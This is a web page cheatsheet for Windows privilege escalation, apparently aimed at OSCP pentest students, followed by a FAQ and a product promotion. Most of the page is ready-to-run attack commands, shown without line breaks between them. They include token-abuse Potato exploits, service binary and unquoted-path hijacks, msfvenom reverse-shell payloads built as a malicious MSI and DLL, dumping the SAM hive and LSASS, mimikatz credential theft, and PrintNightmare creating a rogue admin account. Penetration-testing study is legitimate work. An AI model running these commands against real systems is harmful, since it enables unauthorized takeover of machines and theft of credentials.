# Initial Enumeration
Know your context before touching an exploit — who you are, your privileges, the patch level, and what's installed.
whoami /privwhoami /groupssysteminfonet user; net localgroup administratorswmic qfe get HotFixID,InstalledOnnetstat -ano# Dangerous Token Privileges
Certain privileges are a direct path to SYSTEM. Enumerate with whoami /priv and match against this table.
| Privilege | Exploit |
|---|---|
| SeImpersonate | Potato attacks (PrintSpoofer, GodPotato) |
| SeAssignPrimaryToken | Potato attacks |
| SeBackup | Read SAM/SYSTEM hives → dump hashes |
| SeRestore | Overwrite any protected file |
| SeDebug | Inject into a SYSTEM process |
| SeTakeOwnership | Take ownership of any object |
reg save HKLM\SAM sam.hive && reg save HKLM\SYSTEM system.hive# Potato Attacks (SeImpersonate)
Service accounts (IIS, MSSQL) usually hold SeImpersonatePrivilege. The Potato family abuses it to become SYSTEM.
PrintSpoofer.exe -i -c cmdGodPotato.exe -cmd "cmd /c whoami"JuicyPotatoNG.exe -t * -p C:\Windows\System32\cmd.exeiis apppool\defaultapppool or an MSSQL service account? Check whoami /priv — SeImpersonate is almost always there.# Service Misconfigurations
Weak service permissions let you replace the binary or reconfigure the service to run your payload as SYSTEM.
accesschk.exe -uwcqv "Users" *sc qc SERVICE_NAMEsc config SERVICE_NAME binpath= "C:\temp\rev.exe"sc stop SERVICE_NAME && sc start SERVICE_NAMEicacls "C:\Path\To\service.exe"# Unquoted Service Paths
A service path with spaces and no quotes lets Windows execute an earlier partial path — drop your binary there.
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """icacls "C:\Program Files\Some Folder\"copy rev.exe "C:\Program Files\Some.exe"# Registry, AutoRuns & DLL Hijacking
Writable autorun keys and DLL search-order flaws let your code run at higher privilege.
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Runaccesschk.exe -wvu "HKLM\...\Run"msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f dll -o hijack.dll# AlwaysInstallElevated
If this policy is enabled, any user can install an MSI as SYSTEM — an instant win.
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedmsfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f msi -o evil.msimsiexec /quiet /qn /i evil.msi# Credential Hunting
Windows stores passwords in more places than you'd expect — files, registry, and memory.
reg query HKLM /f password /t REG_SZ /sfindstr /si password *.txt *.ini *.config *.xmldir /s /b C:\Users\*unattend.xml C:\Windows\Panther\*cmdkey /listmimikatz "privilege::debug" "sekurlsa::logonpasswords" exit# Kernel Exploits & PrintNightmare
Use kernel exploits as a last resort — match the exact build from systeminfo.
| Exploit | CVE | Target |
|---|---|---|
| PrintNightmare | CVE-2021-1675 / 34527 | Spooler service (most Windows) |
| HiveNightmare | CVE-2021-36934 | Readable SAM (Win10/11) |
| CVE-2021-40449 | CallbackTable | Win7 – Server 2019 |
| CVE-2020-0787 (BITS) | Arbitrary file move | Win7 – Win10 |
python windows-exploit-suggester.py --database db.xls --systeminfo sysinfo.txtInvoke-Nightmare -NewUser hacker -NewPassword Pass123!# Automated Enumeration Tools
Automate the checks — but validate every finding before you exploit it.
.\winPEASx64.exepowershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks".\Seatbelt.exe -group=all.\SharpUp.exe audit❓ Windows Privilege Escalation FAQ
Enumerate. Run whoami /priv and whoami /groups, then systeminfo for patch level. WinPEAS speeds this up, but the OSCP exam rewards knowing the manual checks.
If you hold SeImpersonatePrivilege (common for IIS/MSSQL service accounts), the Potato family (PrintSpoofer, GodPotato) abuses it to impersonate the SYSTEM token and run as NT AUTHORITY\SYSTEM.
When a service path has spaces and no quotes, Windows tries each partial path. If you can write to an earlier directory, your binary runs with the service's privileges at startup.
A policy letting any user install MSI packages as SYSTEM. If both the HKLM and HKCU keys are 1, build a malicious MSI with msfvenom and run msiexec /quiet /i evil.msi for a SYSTEM shell.
WinPEAS is the standard tool. Alternatives: PowerUp (PowerShell), Seatbelt, and Windows Exploit Suggester for missing patches. Always validate manually before exploiting.
SeImpersonate/SeAssignPrimaryToken (Potato), SeBackup (read SAM), SeRestore, SeDebug and SeTakeOwnership. Check with whoami /priv.
With SYSTEM, dump SAM/LSA with reg save or mimikatz sekurlsa::logonpasswords. You can also dump LSASS with procdump/comsvcs.dll and parse offline with pypykatz.
Abusing the DLL search order: if a privileged program loads a DLL by name and you can write to a directory searched first, your DLL is loaded and runs with that program's privileges.
📚 Related Resources
- Linux Privilege Escalation Cheatsheet — The Linux counterpart: sudo, SUID, capabilities, cron and more
- Active Directory Cheatsheet — After SYSTEM on one host, pivot into the domain to Domain Admin
- OSCP Cheatsheet — Windows privesc is a core part of the OSCP exam
- Reverse Shell Cheatsheet — Every payload to land the initial shell before escalating
- Hashcat Cheatsheet — Crack the SAM/NTLM hashes you dump with hashcat
- Pentesting Glossary — Token, SID, LSASS, SAM and 60+ key terms defined
Turn your SYSTEM compromise into a professional PDF report. AI auto-fills CVE, CVSS and severity.
Want all 12,020+ commands?
This Windows privesc cheatsheet is one branch of the map. Pentest Mindmap organizes 12,020+ commands across 34 categories — recon to post-exploitation — with instant search and one-click copy.
Start free →